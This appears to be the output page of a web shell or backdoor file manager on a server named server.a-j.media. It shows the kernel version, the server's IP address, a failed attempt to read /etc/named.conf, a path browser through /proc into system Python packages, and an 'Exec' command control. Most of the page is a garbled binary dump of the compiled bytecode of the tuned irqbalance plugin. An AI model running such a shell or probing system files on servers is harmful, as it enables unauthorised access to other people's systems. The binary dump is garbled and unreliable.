Linux server.a-j.media 5.14.0-570.44.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Sep 17 10:32:11 EDT 2025 x86_64
Apache
75.119.137.219
Cant read /etc/named.conf
/
proc
/
thread-self
/
root
/
usr
/
lib
/
python3.9
/
site-packages
/
tuned
/
plugins
/
__pycache__
/
[
drwxr-xr-x
]
[ HOME ]
Exec
Submit
plugin_irqbalance.cpython-39.pyc
a �]�i( � @ s\ d dl mZ d dlmZ ddlmZ ddlZddlZddlZej � � ZG dd� dej�Z dS )� )�base)�command_custom� )�constsNc s� e Zd ZdZ� fdd�Zdd� Zdd� Zedd � �Zd d� Z dd � Z dd� Zdd� Zdd� Z dd� Zdd� Zeddd�dd� �Z� ZS )�IrqbalancePlugina� Plug-in for irqbalance settings management. The plug-in configures CPUs which should be skipped when rebalancing IRQs in `/etc/sysconfig/irqbalance`. It then restarts irqbalance if and only if it was previously running. The banned/skipped CPUs are specified as a CPU list via the [option]`banned_cpus` option. .Skip CPUs 2,4 and 9-13 when rebalancing IRQs ==== ---- [irqbalance] banned_cpus=2,4,9-13 ---- ==== c s&